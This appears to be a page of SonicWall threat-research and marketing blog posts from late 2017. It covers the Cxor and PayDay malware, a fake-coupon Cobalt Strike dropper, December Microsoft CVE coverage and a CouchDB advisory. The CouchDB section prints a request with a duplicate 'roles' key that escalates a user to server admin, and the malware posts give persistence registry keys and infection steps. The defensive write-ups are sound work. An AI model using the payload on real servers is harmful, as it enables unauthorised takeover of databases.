Cxor Infostealer actively spreading in the wild.

/in /by

The SonicWall Capture Labs Threat Research Team observed reports of a new variant family of Cxor Malware [Cxor.A] actively spreading in the wild.

The Malware gathers confidential information from the computer such as login details, passwords; financial information sends it to its own C&C Server.

Infection Cycle:

The Malware adds the following files to the system:

  • Malware.exe

    • %Userprofile% svchost.exe [Fake SvcHost.exe]

    • % Userprofile%Local SettingsApplication DataGDIPFONTCACHEV1.DAT [ LogData ]

The Malware adds the following keys to the Windows registry to ensure persistence upon reboot:

Once the computer is compromised, the malware copies its own executable file to Userprofile folder and runs following commands:

A user’s data can be very valuable for an attacker, thereby more data translates to more profit. The main goal of this malware is to get as much user data as possible. The malware also performs key logging and steals clipboard data from target and saves in following registry key:

Command and Control (C&C) Traffic

Cxor.A performs C&C communication over port 1177. The malware sends a victim’s system information

to its own C&C server via following format, here are some examples:

SonicWall Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Cxor.A (Trojan)

Microsoft Security Bulletin Coverage for December 2017

/in /by

SonicWall has analyzed and addressed Microsoft’s security advisories for the month of December, 2017. A list of issues reported, along with SonicWall coverage information are as follows:

  • CVE-2017-11885 Windows RRAS Service Remote Code Execution Vulnerability
    IPS:7037 Suspicious SMB Traffic -ts 7

  • CVE-2017-11886 Scripting Engine Memory Corruption Vulnerability
    IPS:11665 Scripting Engine Memory Corruption Vulnerability (MS16-063) 2

  • CVE-2017-11887 Scripting Engine Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11888 Microsoft Edge Memory Corruption Vulnerability
    SPY:5049 Malformed-File html.MP.71

  • CVE-2017-11889 Scripting Engine Memory Corruption Vulnerability
    IPS:13119 Scripting Engine Memory Corruption Vulnerability (DEC 17) 10

  • CVE-2017-11890 Scripting Engine Memory Corruption Vulnerability
    IPS:13118 Scripting Engine Memory Corruption Vulnerability (DEC 17) 9

  • CVE-2017-11893 Scripting Engine Memory Corruption Vulnerability
    IPS:13117 Scripting Engine Memory Corruption Vulnerability (DEC 17) 8

  • CVE-2017-11894 Scripting Engine Memory Corruption Vulnerability
    IPS:13116 Scripting Engine Memory Corruption Vulnerability (DEC 17) 7

  • CVE-2017-11895 Scripting Engine Memory Corruption Vulnerability
    IPS:13115 Scripting Engine Memory Corruption Vulnerability (DEC 17) 6

  • CVE-2017-11899 Microsoft Windows Security Feature Bypass Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11901 Scripting Engine Memory Corruption Vulnerability
    IPS:13114 Scripting Engine Memory Corruption Vulnerability (DEC 17) 5

  • CVE-2017-11903 Scripting Engine Memory Corruption Vulnerability
    IPS:13113 Scripting Engine Memory Corruption Vulnerability (DEC 17) 4

  • CVE-2017-11905 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11906 Scripting Engine Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11907 Scripting Engine Memory Corruption Vulnerability
    IPS:13109 Scripting Engine Memory Corruption Vulnerability (DEC 17) 1

  • CVE-2017-11908 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11909 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11910 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11911 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11912 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11913 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11914 Scripting Engine Memory Corruption Vulnerability
    IPS:13110 Scripting Engine Memory Corruption Vulnerability (DEC 17) 2

  • CVE-2017-11916 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11918 Scripting Engine Memory Corruption Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11919 Scripting Engine Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11927 Microsoft Windows Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11930 Scripting Engine Memory Corruption Vulnerability
    IPS:13111 Scripting Engine Memory Corruption Vulnerability (DEC 17) 3

  • CVE-2017-11932 Microsoft Exchange Spoofing Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11934 Microsoft PowerPoint Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11935 Microsoft Excel Remote Code Execution Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11936 Microsoft SharePoint Elevation of Privilege Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11937 Microsoft Malware Protection Engine Remote Code Execution Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11939 Microsoft Office Information Disclosure Vulnerability
    There are no known exploits in the wild.
  • CVE-2017-11940 Microsoft Malware Protection Engine Remote Code Execution Vulnerability
    There are no known exploits in the wild.

Cryptocurrency, Ransomware and the Future of Our Economy

/0 Comments/in /by

History is full of people who’ve labored over missed opportunities. Like all other non-bitcoin-owning people, I am one of them.

I first heard of cryptocurrency in early 2013 and scoffed at the idea that something with no intrinsic or collectable value would trade for $20. The concept of owning a portion of a cryptographic code — and it having actual value — is still hard for many to swallow.

Now that an available bitcoin (BTC) is valued at over $19,000 (USD), I languish the fact that an investment of $1,000 in 2013 would have net me half of a million dollars today. Furthermore, had I been tuned into the movement in 2010, I would be a billionaire today. You too. Stings a little, doesn’t it?

At no point in history has it been so easy to become extremely wealthy out of thin air. And it is not just people like you and me who think about this, but criminals as well. This is not only causing major shifts in financial markets, but also in malware development.

What is Cryptocurrency?

With all of the noise about cryptocurrency, here is what we know as we near 2018:

  • There are, or have been, over 1,300 other cryptocurrencies on the market. These are called altcoins.
  • Most people have never owned a single “coin” from any blockchain.
  • Most have no basis for value, which means it’s subjective and speculative (e.g., like a baseball card or an artistic sketch). The community dictates the value.
  • Some are tied to a real currency (e.g., 1 Tether coin = $1 USD).
  • Governments struggle with regulation and don’t want to encourage the use of decentralized currencies.
  • They often function like startups. Founders get an early crack at the supply chain and hold an equitable stake in the algorithm. Instead of a stock IPO they release them as part of an Initial Coin Offering (ICO).
  • Most of the popular coins cannot be mined by your computer anymore. Today, it’s only achieved through professional-grade mining operations.
  • No one knows how high or low bitcoins and cryptocurrency will go; either they will die or become the basis for our future economy.
  • The popular coins today are desired by cybercriminals and are the main form of payment within ransomware.
  • Like a TLS digital certificate, cracking the actual encryption is nearly impossible. Bitcoins are, however, fairly easy to steal and even easier to lose or destroy.
  • Malware is used to steal coins and to also turn infected endpoints into mining bots.

Bitcoin Is the Great Ransomware Enabler

Because cryptocurrency is virtually un-trackable, holds great value and is easily traded online, they are the preferred way to get paid on the black market. Without the value of bitcoin, you wouldn’t have heard about ransomware.

Ransomware is responsible for causing billions of dollars (USD) in damage across the world. Furthermore, the actual cost of the problem isn’t the cost of bitcoin to return your files (if you ever get them back), but the fallout from an attack.

Ransomware is fun for the media because you can easily quantify the ransoms and take photos of the demand screens, but not so fun for hackers. Through the development, updates and propagation of the malware, only between five and 10 percent of people pay the demands. But there is another way.

Bitcoin Mining

Instead of having your victims pay you once, what about having your victims unknowingly work for you? Well, that is what a lot of malware is doing today. By leveraging a portion of your compute power to form a bitcoin mining pool, hackers don’t have to kill the goose that lays the golden egg.

The result? The home computer has less power to run normal processing and incurs higher energy costs. When this approach works its way into a corporate network, it could cause major productivity and service issues.

For some hackers, these two attack vectors are small-time thinking. Instead of counting on a distributed attack vector across a global landscape of endpoints with mixed vulnerabilities, what about a single targeted attack?

Hackers don’t attack the algorithm behind the coins, they attack where they are stored. Cryptocurrency banks and exchanges are ripe targets for attacks. If you factor in the price of a bitcoin (at the time of I started writing it was $8,160 and after editing its $16,000) — the second Mt. Gox attack emptied bitcoin wallets to the tune of over $11 billion USD. Wow! At the time, the bitcoin haul was nearly 744,000 coins worth $436 million USD and caused the value of bitcoin to fall to a three-month low.

Cryptocurrency: Is it the Future?

Like most dual-sided arguments, those inside a social ecosystem are bullishly optimistic. Those outside remain pessimistic. I’m in between. I see the opportunity to capitalize on the attention, but recognize the many limitations behind cryptocurrencies that cap their viability into the future.

I’ve never owned a bitcoin coin but have entered into a few key platforms for the short-term. As mentioned, the value is purely subjective, much like an arbitrary piece of art, which can be a good investment as long as there is a large pool of people with the financial ability to support and bloat its value.

What is the difference in value between this rare Honus Wagner T206 card ($3.12 million USD) and the common Dusty Baker’s 1987 Topps card ($0.70 USD)? The answer lies in the availability of the item and the demand from the consumer.

Bitcoin, Ethereum and Monero all have value because a community of people feels it does. The more people who enter this pool, the greater the potential value. Some are investors and others are victims buying a ransom. But what truly drives the cost of bitcoin is attention — just like a piece of sports memorabilia. When you mirror Google’s search trend data to the historical price of BTC, you see a direct correlation.

What does this tell me? Once the attention fades, people will lose interest. At that point, the price will come down, similar to a Derek Jeter autographed baseball. Additionally, as ransomware becomes less effective, fewer people will buy bitcoin for the sake of digital freedom. And that freedom is the primary thing cryptocurrency can buy.

In the past year, every time the price of bitcoin dropped the Chicken Littles of the world wanted to be the first to cry out, “The sky is falling!” I do believe there will come a time when bitcoins will have the value the 1986 Topps Traded Pete Ladd sitting in the back of your closet (less than $1), but its value won’t crumble in a day.
With the remaining 1,000-odd altcoin cryptocurrencies (that currently hold value) out there with a collective market cap of over $400 billion (at the time of writing), it would take a lot for crypto-investors to create the needed fire sale that would cause the market’s topple. Instead, I see it like the Ice Age; built in stages and then a slow recession.

The altcoins wouldn’t exist today if bitcoin wasn’t popular and a goldmine for the early investors. The creators of these algorithms are like the leaders of pyramid scams. They created the rules and the ecosystem to make money and only exist if their supporters exist, much like an Amway Double-Dutch Triple-Black Platinum Diamond Founder’s Crown Elite Wizard. These will be the first to die. The beginning of their end is when bitcoin hits a plateau lasting more than two months.

In the Ice Age analogy, bitcoin is much like a large glacier that icicles attach to. As the sun shines, they will melt, leaving only the strongest cryptocurrencies to linger. I see bitcoin and Ethereum lasting for years, but only at a small price point. The coins in active circulation will be mostly in the possession of cyber criminals (if they aren’t already) and will be sold to the victims of cybercrimes to pay ransoms until the practice to buy cryptocurrency is outlawed country by country.

And, with that, the official death of ransomware.

Death in a Cathedral

Thirty years from now when we look back at cryptocurrency, we will reminisce about the second coming of the roaring ‘20s. Without the presence of Babe Ruth and the Charleston, we’ll have great unregulated wealth that comes to a crash.

In my conservative outsider-ish advice, I recommend minor, short-term cryptocurrency investments that you are not afraid to lose. Watch the price of bitcoin. When you see a plateau lasting a month, sell. (However, I’m not a financial advisor and I have no fiduciary duties to you. Please do your own research.)

Remember the old adage: movements are built in caves and die in cathedrals. Bitcoin is in the cathedral phase of its life. And if you understand the politics and history of cathedrals, you would be wary of entry. If not, read The Gothic Enterprise: A Guide to Understanding the Medieval Cathedral. Pay attention to fallout surrounding the bankrupt Bishop Milo de Nanteuil.

The Marriage Between Malware & Cryptocurrency

Another adage I was raised with, “make hay when the sun shines,” is what hackers are doing today. As the flames of bitcoin flare, more moths will be drawn to its light. The illicit creation, extortion and theft of digital coins will drive the price to an all-time high.

Because of the outrageous volume of ransomware infections of 2016, and the infamous attacks in 2017, malware defense is at an all-time high too, but it is not enough. Network and end-point security needs to be a serious topic of discussion.

At SonicWall, we’ve made great strides to get ahead of the cryptocurrency attacks; far before a hunk of digital code was valued at dollar volumes higher than what your grandfather paid for his first home.

Before the public release of Zcash, we released the SonicWall Capture Advanced Threat Protection service, which is a cloud-based network sandbox that works in line with SonicWall next-gen firewalls to run and test suspicious code in an isolated environment to prevent newly developed ransomware attacks (and other forms of malware too).

To bolster endpoint protection, we created an alliance with SentinelOne to provide an enhanced endpoint security client framework to provide next-generation anti-virus capabilities to our current endpoint offerings.

To learn more on how SonicWall can prevent malicious attacks, please read our solution brief, Five Best Practices for Advanced Threat Protection. If you’d like to discuss this blog, the marriage between malware and cryptocurrency, and to send your potentially future-worthless digital collectibles, reach out to me on Twitter.

Download Solution Brief

3 Disruptive Trends Driving Demand for Automated Cyber Security for SMBs

/0 Comments/in , /by

Organizations typically struggle to provide a holistic security posture. There are many security vendors providing exciting and innovative solutions. But from a customer perspective, they often become various point solutions solving several unique problems. This often becomes cumbersome, expensive and unmanageable. Some of the most recent trends in this area are discussed in this blog, which could bring about even further complexity to an organizations security posture.

IoT the new mobile?

Internet of Things (IoT) brings similar challenges to the industry, to those which mobile introduced over the last eight years. These endpoints are non general-purpose computing devices often with a specific function, but typically have an operating system, applications and internet access. Unlike Mobile, IoT devices do not usually have the same high level of user interaction, so breaches are more likely to go unnoticed.  The result of poor security controls can result in similar events, to the recent IoT botnet which caused havoc to major online services, including Twitter, Spotify and GitHub.

The industry should look to the lessons from securing mobile and apply these to IoT. This is most important in the consumer space, but as with mobile we’ll see risks arise in the commercial also, including HVAC, alarm systems and even POS devices.

Mobile and Desktop Convergence

More focus needs to be spent on unifying the identity, access and controls for mobile and desktop security. As this often requires custom integration across differing solutions and products, it’s difficult to maintain and troubleshoot when things go wrong.

Some solutions only focus on data protection, endpoint lockdown or only on mobile applications. By themselves, none of these go far enough, and software vendors should aim to provide more open ecosystems. By exposing well documented APIs to customers and integration partners, this would allow for better uniformity across services, with a richer workflow and improved security.

Cloud and SaaS

As we see endpoints split across mobile and desktop, customers are rapidly splitting data across a hybrid IT environment. While we expect hybrid to be the norm for many years to come, organizations need to consider how the security and usability can be blended, in a way that security controls don’t become too fragmented, or result in a poor experience for users and unmanageable for IT.

How SMBs can automate breach detection and prevention

The impact of a security breach to the SMB is significant. When large organizations detect fraudulent activities, they expect to write off a fair percentage of the cost. On the flip side, the impact of a $50,000-$200,000 incident to a small business could be enough for it to cease trading. To the attacker, SMBs are a relatively easy target; as they may not have the expertise or man-power to protect against an advanced and persistent threat.

For 25 years, SonicWall has maintained a rich security portfolio, which is primarily focused on delivering enterprise-grade security for our SMB customers. Our vision is to simplify and automate, to solve complex security challenges — all while meeting the constantly evolving threats. It’s an ongoing arms race after all!

Taking full advantage of our vast database of threat intelligence data, coupled with our advanced research from SonicWall Capture Labs team, we ensure our customers of all sizes can detect and prevent from these threats.  The breadth and depth of our portfolio, also includes those that specifically help with mobile, cloud and IoT security.

Stop ransomware and zero-day cyber attacks

One of our biggest strengths is combatting advanced persistent threats, ransomware and zero-day cyber attacks with the award-winning SonicWall Capture Advanced Threat Protection (ATP) multi-engine sandbox. Capture ATP is now available as a security service across each product in our portfolio, providing a unique protection solution across a multitude of scenarios.

Simplify endpoint protection

For endpoint protection, we are also very excited with our recent partnership agreement with SentinelOne.  This brings the highest level of zero-day malware prevention on the endpoint while concurrently simplifying solutions for organizations of all shapes and sizes.

To learn more about how SonicWall helps our customers implement mobile security, download: Empowering Mobile Workforce to Collaborate Securely.

Download Solution Brief

PayDay – Negotiating ransom with a ransomware operator

/in /by

The SonicWall Capture Labs Threat Research Team has conducted an experimental dialog with a ransomware operator using the PayDay ransomware trojan. PayDay, is a recent variant of the BTCWare ransomware trojan and has been in the wild for a few weeks. PayDay follows the current ransomware operator trend of using email to communicate with their victims in order to demand payment for file decryption. Payment has increased to an astronomical 0.5 Bitcoins (roughly $8000 USD at today’s prices). In this case however, the price could be negotiated lower.

Infection cycle:

Upon infection the following page is displayed on the screen:

The Trojan makes the following changes to the filesystem:

  • encrypts files and adds the following extension to the filename: .[payday@rape.lol]-id-1274.wallet
  • adds %APPDATA%Roamingpayday.hta (as seen above)
  • adds ! FILES ENCRYPTED.txt to any attached drives/network shares after encrypting files

The Trojan adds the following keys to the registry:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun 1payday “%APPDATA%Roamingpayday.hta”
  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun 2baby “%APPDATA%Roamingpayday.hta”

! FILES ENCRYPTED.txt contains the following message:

Good afternoon. Your computer underwent PayDay infection. All data are ciphered by a unique key which is only at us. Without unique key - files cannot be recovered.Each 24 hours are removed 24 files. (we have their copies)If not to start the program the decoder within 72 hours, all files on the computer are removed completely, without a possibility of recovery.Read Attentively instructions how to recover all ciphered data.PayDay------------------------------------------------------You will be able to recover files so:1. to contact us by e-mail: payday@rape.lol- you send your ID identifier and 2 files, up to 1 MB in size everyone.We decipher them, as proof of a possibility of interpretation.also you receive the payment instruction. (payment will be in bitcoin)- report your ID and we will switch off any removal of files (if do not report your ID identifier, then each 24 hours will beto be removed on 24 files. If report to ID-we will switch off it)2. you pay and confirm payment.3. after payment you receive the program the decoder. Which will recover your data and will switch off function of removal of files.------------------------------------------------------You have 48 hours on payment.If you do not manage to pay in 48 hours, then the price of interpretation increases twice.To recover files, without loss, and on the minimum rate, you have to pay within 48 hours.Address for detailed instructions e-mail: payday@rape.lol

We followed the instructions and sent an email attached with 2 encrypted files to payday@rape.lol. In under 10 minutes we received the following response:

The response included an attachment to one of the encrypted files that we sent for decryption. Although the file content had changed, it remained encrypted. Perhaps the operator had used the wrong key. The response also contained an unused (probably freshly generated) bitcoin address for receiving funds: 1PKxaj5JSuZnUE8rLcgLTd7vGDJoNgQQda.

The conversation continued:

“that I would prepare an instrument” ?? Perhaps a job for a seasoned forensic linguistics team. However, what is more interesting is that the operator is prepared to negotiate the price for decryption and accept my 50% discount offer:

The operator begins to show signs of impatience and offers additional help in my request to (obviously not) pay him via PayPal:

We make a brash attempt to obtain an IP address associated with the operator by causing him to visit a webserver under our control:

Moments later access logs reveal a visit from an IP address located in the Czech Republic. After perhaps realizing his mistake, there were subsequent visits from IP addresses located in multiple countries around the world.

This however, may be the operators attempt to obfuscate his tracks after visiting the site directly the first time.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: PayDay.RSM (Trojan)

Apache CouchDB JSON Remote Privilege Escalation

/in /by

Apache CouchDB is open source database software that focuses on ease of use and having a scalable architecture. It has a document-oriented NoSQL database architecture and is implemented in the concurrency-oriented language Erlang; it uses JSON to store data, JavaScript as its query language using MapReduce, and HTTP for an API.

A privilege escalation vulnerability exists in CouchDB. The vulnerability is due to a discrepancy in the behaviours of the JavaScript JSON parser, used in design documents, and the Jiffy JSON parser, used within the CouchDB Erlang-based internals. Allowing an attacker to bypass the user access control.

Vulnerability details

CouchDB has its own web interfac for interaction with the REST API. Both interfaces listen on port 5984/TCP by default. The URL for opening its GUI is: http://:5984/_utils

To send an API request, a user will send the following HTTP POST request, carrying the parameters within a JSON file. For example:

PUT /_users/org.couchdb.user:new_user HTTP/1.1
Host: localhost:5984
Content-Type: application/json
Content-Length: 80
{
“type”: “user”,
“name”: “[username]”,
“roles”: [],
“password”: “[password]”
}

When a JSON object has duplicate keys, only the last value will be assigned. For example, the JSON {“key”:”value1″,”key”:”value2″} will assign value2 to key. And when CouchDB is handling such an API request, the function validate_doc_update() will be called to verify the current user’s privillege. However, CouchDB uses get_value() function which returns only the first value of a given key. And due to the above mentioned JSON rule of handling duplicated key, the last value will be assigned.

{
“type”: “user”,
“name”: “[username]”,
“roles”: “[_admin]”,
“roles”: “[]”,
“password”: “[password]”
}

Such a request will submit a malicious document to the _users or _replicator databases. And escalate the user’s privilege to the server admin of CouchDB.

SonicWall Capture Labs Threat Research team has developed the following signature to identify and stop the attacks:

  • IPS 13106: Apache CouchDB JSON Remote Privilege Escalation

SonicWall MAPP

/in /by

SonicWall is a participant in Microsoft in MAPP (Microsoft Active Protections Program). Through this program, SonicWall Unified Threat Management provides comprehensive, accurate and timely protection for Microsoft products.

SonicWall has released technical articles for Microsoft advisories, listed below:

Civilian Casualties in the Cyberwar

/0 Comments/in /by

Have you been the victim of cybercrime?  If I asked you that question in 2012, you might have said, “I’m not sure.”  But in 2017, I am sure your answer is, “Yes, I’ve been victimized many times.”  That’s bad news.

I joined SonicWall in 2012 and witnessed firsthand the rise of cybercrime headlines occurring on a monthly, weekly, and now daily basis. Among the familiar companies that have been breached over those five years are Target, Home Depot, eBay, PayPal, LinkedIn, Anthem, Yahoo, iCloud, Dropbox, Evernote, and Equifax.  If you use any of these, then you have been an indirect victim of cybercrime and undoubtedly, most of your personal information is somewhere on the Dark Web.

According to http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/ the last five years has seen an escalation of cybercrime on the scale of a world-wide cyberwar. The weapons of this cyberwar are simple and inexpensive to make and deliver compared to conventional weapons. This is due to the ubiquity and connectedness of the Internet that is at once its strength and its weakness. The ubiquity of the internet is a strength in that it enables a free exchange of information and commerce by connecting individuals, businesses, and governments. Yet, this connectedness is a weakness in that it enables criminal, espionage, and terrorist organizations to directly victimize the public, enterprises, and nations on a global scale.

Should you resign yourself to being a casualty in the cyberwar? Go off the grid and forgo connected technologies?  Neither of these options is acceptable for those who desire the convenience that comes with technical innovations such as Alexa and Nest. Then should you hack back? We don’t recommend it since that would be like a civilian joining a conventional war with a pellet gun – you’d have little to gain and much to lose.

In the cyberwar, you are more secure as a non-combatant, but that does not mean you need to be a passive participant. Instead, make sure you have a good defense. If hackers are climbing a ladder to get to you, then build a wall that is higher than their ladder. Windows and MacOS Firewall are defensive tactics, but they are dated architectures that are easy to penetrate. Firewalls in antivirus and wireless routers are marginally better than Windows and MacOS, but they are still not enough to thwart hackers in today’s cyberthreat environment.

To be safe in the cyberwar of 2017, use a next-generation firewall (NGFW) running a full suite of security services.  Unlike less sophisticated firewalls, NGFWs are not static; they learn and grow higher over time, staying higher than the ladders that the hackers are building. The SonicWall Capture Threat Network updates signatures globally around the clock to keep your firewall “higher than the hacker’s ladders.” And if they happen to put a ladder where you didn’t expect one (with a zero-day or unknown malware), you can use Capture ATP to “push away that ladder” before the threat can enter your network.

Tomorrow will bring news of another organization that has been hacked, but you can securely protect the data and devices on your network and avoid being a casualty of the cyberwar. Download – 8 Ways to Protect Your Network Against Ransomware.

Download Solution Brief

How SonicWall Signature “Families” Block Emerging Ransomware Variants

/0 Comments/in , /by

When you look at the most damaging network security invasions over the last year, you see a recurring pattern: leaked government cyber tools being repurposed by cybercriminals. The compromised NSA toolset leaked by Shadow Brokers was devastating in many respects. These were highly targeted tools that many nation states wish they had the operational capacity to deploy.

But the tools developed by the NSA fell into criminal hands, who used them not for state-backed cyber espionage, but for capital gain. They repurposed these tools into WannaCry, Petya and, most recently, BadRabbit, as a means to install ransomware, encrypt information and keep it hostage until a targeted victim pays to release it, typically via Bitcoin.

Alas, sometimes victims pay and the data is still not released.  Sometimes, other actors see an organization has been held hostage and sends their own ransom demands, even though they are not affiliated with the original ransomware creators. The victim organization pays for this misdirection but still cannot unlock their files. They are out of the money and damages are incurred. “There is no honor among thieves,” as they say.

WannaCry, Petya and BadRabbit form a “family” of ransomware variants developed from the same leaked NSA tools. It is when there are these multiple attacks using the same family of exploits that SonicWall can give you breathing room and help you sleep at night.

To explain, first let me discuss how signatures work in our next-generation firewalls (NGFWs). Individual signatures exactly match bit patterns from IP-based frame payloads to detect a specific variant of malware. Our award-winning Capture ATP technology, a multi-engine network sandbox,  not only stops unknown and zero-day threats from entering networks, but also helps create new signatures for detecting emerging malware.

Few vendors look at both incoming and outgoing packets for malware, as it can be a large performance hit to do both. Most vendors are only concerned with traffic going from the internet to the trusted zones and only inspect this pattern. Yet SonicWall inspects every single packet in each direction.

Why? Well, if you own a network and somehow a device is compromised, the only way you will find out is by seeing what it sends out. Is it talking to a command-and-control server (C&C)? Is it sending malware out, as infected machines do? Without scanning every packet, you do not have visibility of your internal network. While it is important to block incoming malware, it’s also important to determine what machines may have been infected and are trying to send data outside your organization.

This brings us back to our “family” of signatures. Have you ever wondered why SonicWall uses a different naming convention than other well-known malware strands?  It’s because we find them first, and give them their own names. Other vendors do this too, but we are vastly different. I am proud to say that SonicWall is extremely competent in creating a family of signatures to cover many individual signatures with one pass. SonicWall uses a fast memory-tree lookup as packets pass through the NGFW with our family of signatures, so only one lookup is needed. This is an extremely fast method of traffic processing.

Sometimes in sales, we have to quote statistics in answer to questions, such as “How many signatures do you store on the firewall?” And we dutifully respond, “Over 32,000 locally, with more in the cloud.” But this only tells part of the story. With our family of signatures, one family will catch 100 or more variation of one signature.

Going back to WannaCry, SonicWall created a family that caught WannaCry right after it was announced to the public. Since the NSA leak variants caused Petya and BadRabbit derivatives, the family signature in your SonicWall firewall blocked all these new attack vectors.

Even though these new variants were targeted delivery to networks, SonicWall blocked all these different bit patterns as part of our WannaCry signature family.  The signature updates were performed in the background – as you enjoyed the holidays with your friends and family.

Download a Tech Brief

Fake coupon downloads Cobalt Strike to take control of your system

/in /by

With the holiday shopping season in full swing, cybercriminals are taking advantage of the fact that consumers are expected to shop for great deals over the next few weeks. During this Cyber sales week, the SonicWall Capture Labs Threat Research Team has spotted a specially crafted document file pretending to be a coupon that will save you big bucks on all items with major online retailers like amazon, ebay and aliexpress. In this infection, multiple levels of scripts are being executed and downloaded to carry on the full attack.

Infection cycle:

The file arrives as a document file.

The text on the file asks the user to click on the image to access a coupon. Doing so, will launch a VBScript file named “Coupon code .vbs”

This script checks if it is being executed in a virtual environment and will terminate. It then spawns schtasks.exe to add a scheduled task named “GooleServices_updaters.”

The scheduled task tries to visit a page on pastebin every hour using mshta.exe, a Microsoft windows file used to launch html applications. This page contains another powershell script.

This powershell script, launches another instance of powershell which then downloads a Cobalt Strike client.

The downloaded Cobalt Stike file has the eicar test file string appended to it possibly in an attempt to throw off malware detection.

Cobalt Strike is a threat emulation software designed for penetration testers and from here, the attacker can then take control of the victim’s machine and penetrate the network by intiating a wide array of commands. Thus, it has become popular with malware authors as well.

Because of the prevalance of these types of malware attacks specially during the holiday season, we urge our users to always be vigilant and cautious with any unsolicited email with unsuspecting document attachments, particularly if you are not certain of the source.

Sonicwall Capture Labs provide protection against this threat with the following signature:

  • GAV: Coupon.VBS (Trojan)